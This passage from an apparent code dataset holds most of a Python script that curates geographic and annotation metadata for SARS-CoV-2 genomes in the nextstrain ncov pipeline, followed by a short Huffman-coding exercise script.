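print(best_fuzzy_match("Noord Holland", ["Noord-Holland", "Zuid-Holland", "Utrecht"]))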
similarity_score:\n similarity_score = diff\n best_match = country2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([region, bold(country), \"*\", \"*\"]) + \"\\t\" + \"/\".join([region, bold(best_match), \"*\", \"*\"])\n\n if identical:\n print(\"Identical countries:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar countries (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n\n ### REGION ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"region\"]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for region2 in data:\n if region2 == region:\n continue\n if clean_string(region) == clean_string(region2): # Identical except for alternative chars\n identical.append(\"/\".join([bold(region), \"*\", \"*\", \"*\"]) + \"\\t\" + \"/\".join([bold(region2), \"*\", \"*\", \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, region, region2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > similarity_score:\n similarity_score = diff\n best_match = region2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([bold(region), \"*\", \"*\", \"*\"]) + \"\\t\" + \"/\".join([bold(best_match), \"*\", \"*\", \"*\"])\n\n if identical:\n print(\"Identical regions:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar regions (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n# Using geoLocator, search for missing coordinates in a supervised manner\n# Automatically add all new coordinates to lat_longs.tsv and store in output folder for manual replacing of the old file\ndef search_missing_latlongs(missing_latlongs):\n geolocator = Nominatim(user_agent=\"hello@nextstrain.org\")\n new_lat_longs = []\n\n for country in missing_latlongs[\"location\"]:\n print(\"# \" + country + \" #\")\n for division in missing_latlongs[\"location\"][country]:\n print(\"\\ndivision: \" + division)\n for location in missing_latlongs[\"location\"][country][division]:\n full_location = location + \", \" + division + \", \" + country\n new_lat_longs.append(find_place(\"location\", location, full_location, geolocator))\n print()\n\n for region in missing_latlongs[\"division\"]:\n for country in missing_latlongs[\"division\"][region]:\n print(\"# \" + country + \" #\")\n for division in missing_latlongs[\"division\"][region][country]:\n full_division = division + \", \" + country\n new_lat_longs.append(find_place(\"division\", division, full_division, geolocator, region))\n print()\n\n for region in missing_latlongs[\"country\"]:\n for country in missing_latlongs[\"country\"][region]:\n new_lat_longs.append(find_place(\"country\", country, country, geolocator))\n\n auto_add_lat_longs(new_lat_longs)\n\n# Suggest geoLocator hits to the user and ask for confirmation or alternative spellings\ndef find_place(geo_level, place, full_place, geolocator, region = \"*\"):\n typed_place = full_place\n redo = True\n tries = 0\n while redo == True:\n if tries < 5:\n try:\n new_place = geolocator.geocode(typed_place, language='en')\n except:\n tries += 1\n continue\n else:\n new_place = None\n tries = 0\n\n if str(new_place) == 'None':\n print(\"\\nCurrent 
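search_missing_latlongs() above resolves the remaining places through geopy's Nominatim geocoder. A minimal sketch of a single lookup, assuming geopy is installed and network access is available; the query string is illustrative and calls are subject to Nominatim's rate limits.

from geopy.geocoders import Nominatim

geolocator = Nominatim(user_agent="hello@nextstrain.org")
hit = geolocator.geocode("Heidelberg, Baden-Wuerttemberg, Germany", language="en")
if hit is not None:
    # same TSV layout that auto_add_lat_longs() appends to lat_longs.tsv
    print("location" + "\t" + "Heidelberg" + "\t" + str(hit.latitude) + "\t" + str(hit.longitude))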
place for missing {}:\\t\".format(geo_level) + full_place)\n print(\"The place as currently written could not be found.\")\n answer = 'n'\n else:\n new_place_string = new_place.address\n full_place_string = full_place\n for level in full_place.split(\", \"):\n if clean_string(level) in clean_string(new_place_string):\n new_place_string = bold(level).join(new_place_string.split(level))\n full_place_string = bold(level).join(full_place_string.split(level))\n for level in new_place.address.split(\", \"):\n if clean_string(level) in clean_string(full_place_string):\n full_place_string = bold(level).join(full_place_string.split(level))\n new_place_string = bold(level).join(new_place_string.split(level))\n\n print(\"\\nCurrent place for missing {}:\\t\".format(geo_level) + full_place_string)\n\n print(\"Geopy suggestion: \"+ new_place_string)\n\n if geo_level != \"division\":\n answer = input('Is this the right place [y/n]? ')\n else:\n answer = input('Is this the right place (a - alter division level) [y/n/a]? ')\n\n if answer.lower() == 'y':\n coordinates = (geo_level + \"\\t\" + place + \"\\t\" + str(new_place.latitude) + \"\\t\" + str(new_place.longitude))\n redo = False\n\n elif geo_level == \"division\" and answer.lower() == \"a\":\n division2 = input(\"Type correct division to produce corrective rule: \")\n (division, country) = full_place.split(\", \")\n print(bold(\"/\".join([region, country, division, \"\"]) + \"\\t\" + \"/\".join([region, country, division2, division])))\n redo = False\n coordinates = (\"location\" + \"\\t\" + place + \"\\t\")\n\n else:\n # Let the user correct/have more detail for what's typed\n print(\"For: \"+full_place)\n typed_place = input(\"Type a more specific place name or 'NA' to leave blank: \")\n if typed_place.lower() == 'na':\n coordinates = (geo_level + \"\\t\" + place + \"\\t\")\n redo = False\n\n #print(coordinates)\n return coordinates\n\n# Add new coordinates to lat_longs.tsv and sort the file before storing in the output folder\ndef auto_add_lat_longs(new_lat_longs):\n with open(\"defaults/lat_longs.tsv\") as f:\n lat_longs_old = f.readlines()\n\n lat_longs = lat_longs_old + [l + \"\\n\" for l in new_lat_longs if len(l.split(\"\\t\")) == 4]\n\n dataset = {\"location\": [], \"division\": [], \"country\": [], \"region\": []}\n for line in lat_longs:\n if line == \"\\n\":\n continue\n dataset[line.split(\"\\t\")[0]].append(line)\n\n lat_longs_sorted = []\n\n regions_list = []\n for type in dataset:\n no_special_char = {clean_string(dataset[type][i].split(\"\\t\")[1]): i for i in range(len(dataset[type]))}\n for line in sorted(no_special_char):\n i = no_special_char[line]\n line_orig = dataset[type][i]\n if line_orig.startswith(\"country\") and line_orig.split(\"\\t\")[1] in region_order:\n regions_list.append(line_orig)\n continue\n lat_longs_sorted.append(line_orig)\n if type == \"country\":\n lat_longs_sorted.append(\"\\n\")\n lat_longs_sorted += regions_list\n lat_longs_sorted.append(\"\\n\")\n\n if lat_longs_sorted != lat_longs_old:\n with open(path_to_output_files + latlongs_file, \"w\") as f:\n for line in lat_longs_sorted:\n f.write(line)\n print(bold(\"\\nNew lat_longs written out to \" + path_to_output_files + latlongs_file + \". 
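find_place() above tolerates transient geocoder failures by retrying up to five times before treating the place as not found. The same idea as a small standalone helper; geolocator is any geopy geocoder instance, and the broad except mirrors the original's behaviour.

def geocode_with_retries(geolocator, query, max_tries=5):
    # give the service a few chances (network hiccups, timeouts) before giving up
    for _ in range(max_tries):
        try:
            return geolocator.geocode(query, language="en")
        except Exception:
            continue
    return None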
Remember to replace the old file in \" + path_to_default_files + \".\"))\n else:\n print(\"No changes to \" + latlongs_file + \".\")\n\n# Given either the new lat_longs file (if new coordinates were added in this iteration of the script) or the old file,\n# Construct the color_ordering.tsv file based on the data dictionary. Only places with existing coordinates are added.\n# Countries and divisions are sorted according to the coordinates, locations are sorted by the alphabet. Regions have\n# a fixed ordering.\ndef build_ordering(data, new_latlongs):\n ordering = read_ordering(path_to_default_files)\n\n if new_latlongs:\n latlongs_path = path_to_output_files\n else:\n latlongs_path = path_to_default_files\n latlongs = read_latlongs(latlongs_path)\n\n # Drop all empty locations\n data_clean = {}\n for region in data:\n data_clean[region] = {}\n for country in data[region]:\n data_clean[region][country] = {}\n for division in data[region][country]:\n data_clean[region][country][division] = []\n for location in data[region][country][division]:\n if location != \"\":\n data_clean[region][country][division].append(location)\n\n with open(path_to_output_files + ordering_file, \"w\") as out:\n for hierarchy in ordering:\n if hierarchy not in [\"region\", \"country\", \"division\", \"location\"]:\n for l in ordering[hierarchy]:\n out.write(hierarchy + \"\\t\" + l + \"\\n\")\n else:\n for region in region_order:\n\n if hierarchy == \"region\":\n out.write(\"region\\t\" + region + \"\\n\")\n else:\n\n out.write(\"\\n# \" + region + \"\\n\")\n for country in sort_by_coordinates(data_clean[region], latlongs[\"country\"]):\n\n if hierarchy == \"country\":\n out.write(\"country\\t\" + country + \"\\n\")\n else:\n\n if hierarchy == \"location\":\n if sum([len(data_clean[region][country][d]) for d in data_clean[region][country]]) > 0: # only write country as a comment if there is data following it\n out.write(\"\\n### \" + country)\n\n if hierarchy == \"division\":\n if len(data_clean[region][country]) > 0:\n out.write(\"\\n### \" + country + \"\\n\")\n\n for division in sort_by_coordinates(data_clean[region][country], latlongs[\"division\"]):\n\n if hierarchy == \"division\":\n out.write(\"division\\t\" + division + \"\\n\")\n continue\n\n if len(data_clean[region][country][division]) > 0: # only write division as a comment if there is data following it\n out.write(\"\\n# \" + division + \"\\n\")\n\n for location in sorted(data_clean[region][country][division]):\n out.write(\"location\\t\" + location + \"\\n\")\n\n if hierarchy == \"location\" or hierarchy == \"division\":\n out.write(\"\\n################\\n\")\n\n out.write(\"\\n################\\n\\n\\n\")\n\n new_ordering = read_ordering(path_to_output_files)\n\n if not new_ordering == ordering:\n print(bold(\"Attention: \" + ordering_file + \" was altered! 
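auto_add_lat_longs() above groups lines by their level and sorts each group by a cleaned place name, so entries with accents or other special characters land next to their plain-ASCII spellings. A minimal sketch of such a sort key, using unicodedata to strip combining marks as a stand-in for clean_string(); the sample lines are illustrative.

import unicodedata

def clean(name):
    # drop accents and lower-case, e.g. "Sao Paulo" and "São Paulo" sort together
    decomposed = unicodedata.normalize("NFD", name)
    return "".join(c for c in decomposed if unicodedata.category(c) != "Mn").lower()

lines = [
    "division\tSão Paulo\t-23.55\t-46.63\n",
    "division\tSalta\t-24.78\t-65.41\n",
    "division\tSantiago Metropolitan\t-33.46\t-70.65\n",
]
lines.sort(key=lambda line: clean(line.split("\t")[1]))
print(", ".join(line.split("\t")[1] for line in lines))  # Salta, Santiago Metropolitan, São Paulo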
Remember to replace the old file in \" + path_to_default_files + \".\"))\n else:\n print(\"No changes to \" + ordering_file + \".\")\n\n# Sort a list of divisions or countries by latitude or longitude (whichever has the larger range)\ndef sort_by_coordinates(data, coordinates):\n max_lat = -90\n min_lat = 90\n max_long = -150\n min_long = 150\n for loc in data:\n if loc in coordinates:\n (lat, long) = coordinates[loc]\n max_lat = max(max_lat, lat)\n min_lat = min(min_lat, lat)\n max_long = max(max_long, long)\n min_long = min(min_long, long)\n\n index = 1\n if (max_lat - min_lat) > (max_long - min_long):\n index = 0\n\n loc_per_coord = {}\n for loc in data:\n if loc in coordinates:\n coord = coordinates[loc][index]\n if coordinates[loc][index] in loc_per_coord:\n loc_per_coord[coord].append(loc)\n else:\n loc_per_coord[coord] = [loc]\n sorted_locs = []\n for coord in sorted(loc_per_coord):\n sorted_locs.extend(loc_per_coord[coord])\n return sorted_locs\n\n# Collect all stored annotations in a categorized manner, sorted by topics (e.g. geography-related) and annotation type\n# (e.g. location, division, country...)\ndef read_annotations(annotationsFile, gisaid):\n types = {\"geography\": [\"location\", \"division\", \"country\", \"region\", \"division_exposure\", \"country_exposure\", \"region_exposure\"], \"special\": [\"sampling_strategy\", \"date\", \"host\", \"strain\"], \"paper\": [\"title\", \"paper_url\"]}\n types_inverted = {t:section for section, type in types.items() for t in type}\n annotations = {\"comments\": [], \"geography\": {}, \"special\": {}, \"paper\": {}}\n\n with open(path_to_annotations + annotationsFile) as f:\n line = f.readline()\n while line:\n if line.startswith(\"#\"):\n annotations[\"comments\"].append(line.strip())\n else:\n l = line.strip().split(\"\\t\")\n if line.endswith(\"\\t\\n\"):\n l.append(\"\")\n if gisaid:\n if len(l) != 4:\n print(\"Invalid annotation length (annotation deleted): \" + line.strip())\n line = f.readline()\n continue\n else:\n id = l[0] + \"\\t\" + l[1]\n type = l[2]\n content = l[3]\n else:\n if len(l) != 3:\n print(\"Invalid annotation: \" + line.strip())\n line = f.readline()\n continue\n else:\n id = l[0]\n type = l[1]\n content = l[2]\n if type not in types_inverted:\n print(\"Invalid annotation type (annotation deleted): \" + line.strip())\n else:\n section = types_inverted[type]\n if id not in annotations[section]:\n annotations[section][id] = {}\n if type in annotations[section][id]:\n print(\"Duplicate annotation (first annotation deleted): \" + line.strip() + \" vs. 
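sort_by_coordinates() above orders countries or divisions along whichever axis, latitude or longitude, spans the larger range, which keeps color_ordering.tsv roughly geographic. A compact sketch of the same idea with illustrative coordinates; places without coordinates are skipped, as in the original.

def sort_places(places, coords):
    known = [p for p in places if p in coords]
    if not known:
        return []
    lats = [coords[p][0] for p in known]
    longs = [coords[p][1] for p in known]
    # sort along the axis with the larger spread
    axis = 0 if (max(lats) - min(lats)) > (max(longs) - min(longs)) else 1
    return sorted(known, key=lambda p: coords[p][axis])

coords = {"Lisbon": (38.7, -9.1), "Rome": (41.9, 12.5), "Warsaw": (52.2, 21.0)}
print(sort_places(["Rome", "Warsaw", "Lisbon", "Atlantis"], coords))  # ['Lisbon', 'Rome', 'Warsaw']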
\" + type + \"\\t\" + annotations[section][id][type])\n annotations[section][id][type] = content\n line = f.readline()\n return annotations\n\n# Given applied geoLocationRules and manualAnnotationRules, search the metadata for all affected strains\ndef create_annotations(metadata_filename, applied_rules_geoLocation, applied_rules_manual, gisaid):\n geoLocationAnnotations = {}\n manualAnnotations = {}\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n country_i = header.index(\"country\")\n region_i = header.index(\"region\")\n division_i = header.index(\"division\")\n location_i = header.index(\"location\")\n strain_i = header.index(\"strain\")\n gisaid_epi_isl_i = header.index(\"gisaid_epi_isl\")\n genbank_accession_i = header.index(\"genbank_accession\")\n host_i = header.index(\"host\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n country = l[country_i]\n region = l[region_i]\n division = l[division_i]\n location = l[location_i]\n strain = l[strain_i]\n\n if gisaid:\n id = l[gisaid_epi_isl_i]\n else:\n id = l[genbank_accession_i]\n\n if (region, country, division, location) in applied_rules_geoLocation:\n geoLocationAnnotations[id] = (region, country, division, location), applied_rules_geoLocation[(region, country, division, location)], strain\n\n if (region, country, division, location) in applied_rules_manual:\n manualAnnotations[id] = (region, country, division, location), applied_rules_manual[(region, country, division, location)], strain\n\n line = f.readline()\n\n return geoLocationAnnotations, manualAnnotations\n\n# Compare old annotations with new alterations to the data and flag & adjust conflicts\n# (Since annotations overwrite geoLocationRules in the ncov-ingest pipeline, there is a need to find all annotations\n# that conflict with new rules and adjust the annotation accordingly)\n# For geoLocationRules, only test whether there are conflicting annotations that need adjustment.\n# For manualAnnotationRules, also produce new annotations.\ndef find_conflicting_annotations(annotations, geoLocationAnnotations, manualAnnotations, gisaid):\n for id in annotations[\"geography\"]:\n EPI_ISL = id.split(\"\\t\")[-1]\n for ruleSet in [geoLocationAnnotations, manualAnnotations]:\n if EPI_ISL in ruleSet:\n (region2, country2, division2, location2) = ruleSet[EPI_ISL][1]\n annotations_correct = {\"region\": region2, \"country\": country2, \"division\": division2, \"location\": location2}\n for type in annotations_correct:\n if type in annotations[\"geography\"][id]:\n name0 = annotations[\"geography\"][id][type]\n comment = \"\"\n if \"#\" in name0:\n (name0, comment) = name0.split(\" #\")\n if name0 != annotations_correct[type]:\n print(f\"Conflicting annotation: {id}\\t{bold(type + ' ' + name0)} will be replaced with {bold(annotations_correct[type])}\")\n annotations[\"geography\"][id][type] = annotations_correct[type]\n if comment != \"\":\n annotations[\"geography\"][id][type] += \" #\" + comment\n\n for EPI_ISL in manualAnnotations:\n (region, country, division, location) = manualAnnotations[EPI_ISL][0]\n (region2, country2, division2, location2) = manualAnnotations[EPI_ISL][1]\n strain = manualAnnotations[EPI_ISL][2]\n if gisaid:\n id = strain + \"\\t\" + EPI_ISL\n else:\n id = EPI_ISL\n annotations_correct = {\"region\": (region, region2), \"country\": (country, country2), \"division\": (division, division2), \"location\": (location, location2)}\n for type in annotations_correct:\n if annotations_correct[type][0] != 
annotations_correct[type][1]:\n if id not in annotations[\"geography\"]:\n annotations[\"geography\"][id] = {}\n if type not in annotations[\"geography\"][id]:\n annotations[\"geography\"][id][type] = annotations_correct[type][1] + \" # previously \" + annotations_correct[type][0]\n\n return annotations\n\nclade_dates = {\n \"19A\": \"2019-12-01\",\n \"19B\": \"2019-12-01\",\n \"20A\": \"2020-01-20\",\n \"20A.EU2\": \"2020-02-15\",\n \"20B\": \"2020-02-14\",\n \"20C\": \"2020-02-25\",\n \"20D\": \"2020-03-12\",\n \"20E (EU1)\": \"2020-05-27\",\n \"20F\": \"2020-05-24\",\n \"20G\": \"2020-06-11\",\n \"20H (Beta, V2)\": \"2020-08-10\",\n \"20I (Alpha, V1)\": \"2020-09-20\",\n \"20J (Gamma, V3)\": \"2020-10-29\",\n \"21A (Delta)\": \"2020-10-30\",\n \"21B (Kappa)\": \"2020-10-30\",\n \"21C (Epsilon)\": \"2020-08-03\",\n \"21D (Eta)\": \"2020-11-21\",\n \"21E (Theta)\": \"2021-01-10\",\n \"21F (Iota)\": \"2020-11-20\",\n \"21G (Lambda)\": \"2021-01-05\",\n \"21H\": \"2021-01-05\",\n}\n# Check for special cases where annotations need to be introduced, e.g. special characters in strain names, or adjustment to \"Mink\"\n# Also check for sampling dates that are too early for the assigned clade and auto-add to exclude\ndef special_metadata_checks(metadata_filename, annotations, gisaid):\n special_annotations = {}\n\n unknown_clades = []\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().strip().split(\"\\t\")\n strain_i = header.index(\"strain\")\n gisaid_epi_isl_i = header.index(\"gisaid_epi_isl\")\n genbank_accession_i = header.index(\"genbank_accession\")\n host_i = header.index(\"host\")\n clade_i = header.index(\"Nextstrain_clade\")\n date_i = header.index(\"date\")\n clock_deviation_i = header.index(\"clock_deviation\")\n\n line = f.readline()\n while line:\n l = line.strip().split(\"\\t\")\n host = l[host_i]\n strain = l[strain_i]\n\n if gisaid:\n id = strain + \"\\t\" + l[gisaid_epi_isl_i]\n else:\n id = l[genbank_accession_i]\n\n # Check for special cases where annotations need to be introduced, e.g. 
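The clade_dates table above supports the check described in the following comment: samples whose collection date predates the emergence of their assigned clade are suspect and can be excluded. A minimal sketch of that comparison using one entry from the table; the margin parameter is an illustrative knob, not something the script defines.

from datetime import date, timedelta

clade_dates_subset = {"20I (Alpha, V1)": "2020-09-20"}

def sampled_too_early(sample_date, clade, margin_days=0):
    # skip incomplete dates like "2020-03" and clades without a reference date
    if clade not in clade_dates_subset or sample_date.count("-") != 2:
        return False
    sampled = date.fromisoformat(sample_date)
    emergence = date.fromisoformat(clade_dates_subset[clade])
    return sampled < emergence - timedelta(days=margin_days)

print(sampled_too_early("2020-03-15", "20I (Alpha, V1)"))  # True -> candidate for exclude.txt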
special characters in strain names, or adjustment to \"Mink\"\n if host == \"Neovison vison\" or host == \"Mustela lutreola\":\n print(\"Adjust host \" + host + \" to Mink\")\n if id not in special_annotations:\n special_annotations[id] = {}\n special_annotations[id][\"host\"] = \"Mink # previously \" + host\n\n problematic_char = [\"'\", \"`\"]\n for c in problematic_char:\n if c in strain:\n strain2 = strain.replace(c, \"-\")\n print(\"Adjust strain \" + strain + \" to \" + strain2)\n if id not in special_annotations:\n special_annotations[id] = {}\n special_annotations[id][\"strain\"] = strain2 + \" # previously \" + strain\n\n line = f.readline()\n\n for id in special_annotations:\n if id not in annotations[\"special\"]:\n annotations[\"special\"][id] = {}\n for type in special_annotations[id]:\n if type in annotations[\"special\"][id]:\n if annotations[\"special\"][id][type] != special_annotations[id][type]:\n print(\"Conflicting annotation: \" + id + \"\\t\" + bold(type + \" \" + annotations[\"special\"][id][type]) + \" will be replaced with \" + bold(special_annotations[id][type]))\n annotations[\"special\"][id][type] = special_annotations[id][type]\n\n return annotations\n\n# Write the adjusted annotation set to the output folder in a sorted manner\ndef write_annotations(annotations, annotationsFile):\n with open(path_to_output_files + annotationsFile, \"w\") as out:\n for section in annotations:\n if section == \"comments\":\n for line in sorted(annotations[section]):\n out.write(line + \"\\n\")\n else:\n for id in sorted(annotations[section]):\n for type in sorted(annotations[section][id]):\n out.write(id + \"\\t\" + type + \"\\t\" + annotations[section][id][type] + \"\\n\")\n\n\npath_to_metadata = \"data/\"\npath_to_default_files = \"defaults/\" # Contains color_ordering.tsv and lat_longs.tsv\npath_to_config_files = \"scripts/curate_metadata/config_curate_metadata/\"\npath_to_output_files = \"scripts/curate_metadata/output_curate_metadata/\"\npath_to_annotations = \"../ncov-ingest/source-data/\" # Contains gisaid and genbank annotation files\nPath(path_to_output_files).mkdir(parents=True, exist_ok=True)\nPath(path_to_config_files).mkdir(parents=True, exist_ok=True)\n\ngisaid_metadata_file = \"downloaded_gisaid.tsv\"\ngenbank_metadata_file = \"metadata_genbank.tsv\"\nabbreviations_file = \"abbreviations.txt\"\naccepted_additions_file = \"acceptedExposureAdditions.txt\"\ngeoLocationRules_file = \"geoLocationRules.txt\"\nmanualAnnotationRules_file = \"manualAnnotationRules.txt\"\ninternationalExceptions_file = \"internationalExceptions.txt\"\ngisaidAnnotationsFile = \"gisaid_annotations.tsv\"\ngenbankAnnotationsFile = \"genbank_annotations.tsv\"\nordering_file = \"color_ordering.tsv\"\nlatlongs_file = \"lat_longs.tsv\"\nexclude_file = \"exclude.txt\"\n\nif not os.path.exists(path_to_config_files + geoLocationRules_file):\n with open(path_to_config_files + geoLocationRules_file, 'w'): pass\n\nif not os.path.exists(path_to_config_files + manualAnnotationRules_file):\n with open(path_to_config_files + manualAnnotationRules_file, 'w'): pass\n\nmanualAnnotationsDelimiter = [\"/\", \",\"]\nregion_order = [\"Asia\", \"Oceania\", \"Africa\", \"Europe\", \"South America\", \"North America\"]\n\nif __name__ == '__main__':\n\n print(\"\\n===============================================\\n\")\n # Collect metadata from gisaid and genbank in a joint, multi-level dictionary accessible via data[region][country][division] = list_of_locations\n data = {}\n # count occurences\n geo_location_occurences 
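The two checks above normalise mink hosts and replace characters that cause trouble downstream in strain names, recording the previous value as an annotation comment. The same logic as a tiny standalone function; the sample strain name is made up.

def special_checks(strain, host):
    fixes = {}
    if host in ("Neovison vison", "Mustela lutreola"):
        fixes["host"] = "Mink # previously " + host
    cleaned = strain
    for c in ("'", "`"):
        cleaned = cleaned.replace(c, "-")
    if cleaned != strain:
        fixes["strain"] = cleaned + " # previously " + strain
    return fixes

print(special_checks("hCoV-19/Denmark/mink`farm-1/2020", "Neovison vison"))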
= {\"region\": Counter(), \"country\": Counter(), \"division\": Counter(), \"location\": Counter()}\n print(\"Reading GISAID metadata...\")\n data, geo_location_occurences = read_metadata(gisaid_metadata_file, data, geo_location_occurences)\n\n print(\"Reading GenBank metadata...\")\n data, geo_location_occurences = read_metadata(genbank_metadata_file, data, geo_location_occurences, genbank=True)\n\n print(\"\\n===============================================\\n\")\n # Add countries, regions and divisions that only appear in the exposure info from gisaid metadata\n # (We don't have any exposure info for genbank)\n print(\"Checking exposure consistency...\")\n data = read_exposure(data, gisaid_metadata_file, accepted_additions_file)\n\n print(\"\\n===============================================\\n\")\n print(\"Applying new geoLocationRules...\")\n # Apply new general rules that will be copied over into ncov-ingest/source-data/gisaid_geoLocationRules.tsv\n data, applied_rules_geoLocation = apply_rules(data, geoLocationRules_file)\n\n print(\"\\nApplying manualAnnotationRules...\")\n # Apply new specific rules that will be translated into annotations\n # (needed for cases where geoLocationRules won't work, e.g. for locations containing the delimiter char '/')\n data, applied_rules_manual = apply_rules(data, manualAnnotationRules_file, delimiter = manualAnnotationsDelimiter)\n\n print(\"\\n(Applying adjustments to international cruiseships...)\")\n # Some cruiseships need adjustment to one country only so they don't appear multiple times in color_ordering.tsv\n data, applied_rules_exceptions = apply_rules(data, internationalExceptions_file, print_rules = False)\n\n print(\"\\n===============================================\\n\")\n # Check for names that appear as division and location\n print(\"Checking for division inconsistencies...\")\n check_division_inconsistency(data)\n\n print(\"\\n===============================================\\n\")\n # Check for locations and divisions that appear multiple times\n print(\"Checking for location duplicates...\")\n locations_duplicates = check_duplicates(data, abbreviations_file)\n\n print(\"\\n===============================================\\n\")\n # List all locations, divisions, coutnries and regions that have no lat_longs in defaults/lat_longs.tsv\n print(\"Checking for missing lat_longs...\")\n missing_latlongs = missing_coordinates(data, path_to_default_files, geo_location_occurences)\n print_missing_places(missing_latlongs)\n\n print(\"\\n===============================================\\n\")\n # For all missing places, search for names that are similar or identical (when not considering special characters)\n # For locations, also consider special cases for USA counties\n print(\"Checking for similar names...\")\n search_similar_names(data, missing_latlongs, locations_duplicates)\n\n print(\"\\n===============================================\\n\")\n # Using geopy, search coordinates for all missing places and auto-sort them into lat_longs.tsv\n answer = input(\"Would you like to search for missing lat_longs [y/n]? 
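The main block above keeps one Counter per geographic level while reading the metadata; these counts later feed the occurrence threshold used for missing divisions. A minimal sketch of that bookkeeping with made-up rows, keeping the script's variable spelling.

from collections import Counter

geo_location_occurences = {"region": Counter(), "country": Counter(),
                           "division": Counter(), "location": Counter()}

rows = [("Europe", "Germany", "Bavaria", "Munich"),
        ("Europe", "Germany", "Bavaria", ""),
        ("Asia", "Japan", "Tokyo", "")]
for region, country, division, location in rows:
    geo_location_occurences["region"][region] += 1
    geo_location_occurences["country"][country] += 1
    geo_location_occurences["division"][division] += 1
    if location != "":
        geo_location_occurences["location"][location] += 1

print(geo_location_occurences["division"]["Bavaria"])  # 2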
\")\n if answer == \"y\":\n print(\"\\nSearching for lat_longs...\")\n search_missing_latlongs(missing_latlongs)\n else:\n print(\"\\nAuto-sorting \" + latlongs_file + \"...\")\n auto_add_lat_longs([])\n\n print(\"\\n===============================================\\n\")\n # Reconstruct the color_ordering.tsv file based on the data dictionary and old and new lat_longs\n print(\"Constructing new color_ordering file...\")\n build_ordering(data, answer == \"y\")\n\n\n print(\"\\n===============================================\\n\")\n # Collect all known annotations and sort by type & strain\n print(\"\\nReading annotations...\")\n annotations_gisaid = read_annotations(gisaidAnnotationsFile, gisaid=True)\n annotations_open = read_annotations(genbankAnnotationsFile, gisaid=False)\n\n answer2 = input(\"Would you like to check annotations for conflicts with geoLocationRules and produce manualAnnotations [y/n]? \")\n if answer2 == \"y\":\n\n # Collect all strains for which new rules apply\n print(\"\\n----------\\n\")\n print(\"Applying new geoLocationRules and manualAnnotationRules to the metadata...\")\n geoLocationAnnotations_gisaid, manualAnnotations_gisaid = create_annotations(gisaid_metadata_file, applied_rules_geoLocation, applied_rules_manual, gisaid = True)\n geoLocationAnnotations_open, manualAnnotations_open = create_annotations(genbank_metadata_file, applied_rules_geoLocation, applied_rules_manual, gisaid=False)\n\n # Compare affected strains with annotations and search for conflicts (-> update annotations to fit new rules)\n # Also insert new annotations created by manualAnnotationRules\n print(\"\\n----------\\n\")\n print(\"Searching for conflicting annotations and adding manualAnnotationRules...\")\n annotations_gisaid = find_conflicting_annotations(annotations_gisaid, geoLocationAnnotations_gisaid, manualAnnotations_gisaid, gisaid = True)\n annotations_open = find_conflicting_annotations(annotations_open, geoLocationAnnotations_open, manualAnnotations_open, gisaid = False)\n\n print(\"\\n----------\\n\")\n # Perform special checks on the metadata, e.g. check for Mink host consistency, check if date is consistent with clade...\n answer3 = input(\"Would you like to perform additional metadata checks (e.g. date, host, strain name) [y/n]? \")\n if answer3 == \"y\":\n print(\"Traversing metadata...\")\n annotations_gisaid = special_metadata_checks(gisaid_metadata_file, annotations_gisaid, gisaid = True)\n annotations_open = special_metadata_checks(genbank_metadata_file, annotations_open, gisaid = False)\n\n\n # Sort and write updated annotation files to output folder\n print(\"\\n----------\\n\")\n print(\"Writing updated annotation files to \" + path_to_output_files + \"...\")\n write_annotations(annotations_gisaid, gisaidAnnotationsFile)\n write_annotations(annotations_open, genbankAnnotationsFile)\n\n with open(path_to_annotations + gisaidAnnotationsFile, \"r\") as f:\n annot_gisaid_old = f.read()\n with open(path_to_output_files + gisaidAnnotationsFile, \"r\") as f:\n annot_gisaid_new = f.read()\n if annot_gisaid_old != annot_gisaid_new:\n print(bold(\"Attention: \" + gisaidAnnotationsFile + \" was altered! 
Remember to replace the old file in \" + path_to_annotations + \".\"))\n else:\n print(\"No changes to \" + gisaidAnnotationsFile + \".\")\n\n with open(path_to_annotations + genbankAnnotationsFile, \"r\") as f:\n annot_open_old = f.read()\n with open(path_to_output_files + genbankAnnotationsFile, \"r\") as f:\n annot_open_new = f.read()\n if annot_open_old != annot_open_new:\n print(bold(\"Attention: \" + genbankAnnotationsFile + \" was altered! Remember to replace the old file in \" + path_to_annotations + \".\"))\n else:\n print(\"No changes to \" + genbankAnnotationsFile + \".\")\n\n","repo_name":"nextstrain/ncov","sub_path":"scripts/curate_metadata/curate_metadata.py","file_name":"curate_metadata.py","file_ext":"py","file_size_in_byte":63882,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"3"} +{"seq_id":"33789096115","text":"import sys\ndata = sys.stdin.read()\n\nclass Tree():\n def __init__(self, left, right):\n self.left = left\n self.right = right\n\ndef huffman(node, code = ''):\n if type(node) is int: return {node: code}\n dict = {}\n dict.update(huffman(node.left, code + '0'))\n dict.update(huffman(node.right, code + '1'))\n return dict\n\nfor line in data.splitlines()[1:]:\n nums = [(int(nums), int(nums)) for nums in line.split(',')]\n nums_sort = sorted(nums, reverse = True)\n while len(nums_sort) > 1:\n node_a, value_a = nums_sort[-1]\n node_b, value_b = nums_sort[-2]\n nums_sort = nums_sort[:-2]\n node = Tree(node_a, node_b)\n nums_sort.append((node, value_a + value_b))\n nums_sort = sorted(nums_sort, key = lambda node: node[1], reverse = True)\n \n ans = ''\n for node, value in nums:\n ans += f'{len(huffman(nums_sort[0][0])[node])},'\n print(ans[:-1])","repo_name":"rtashklzx47277/Python_practice","sub_path":"NTUB/10542.py","file_name":"10542.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 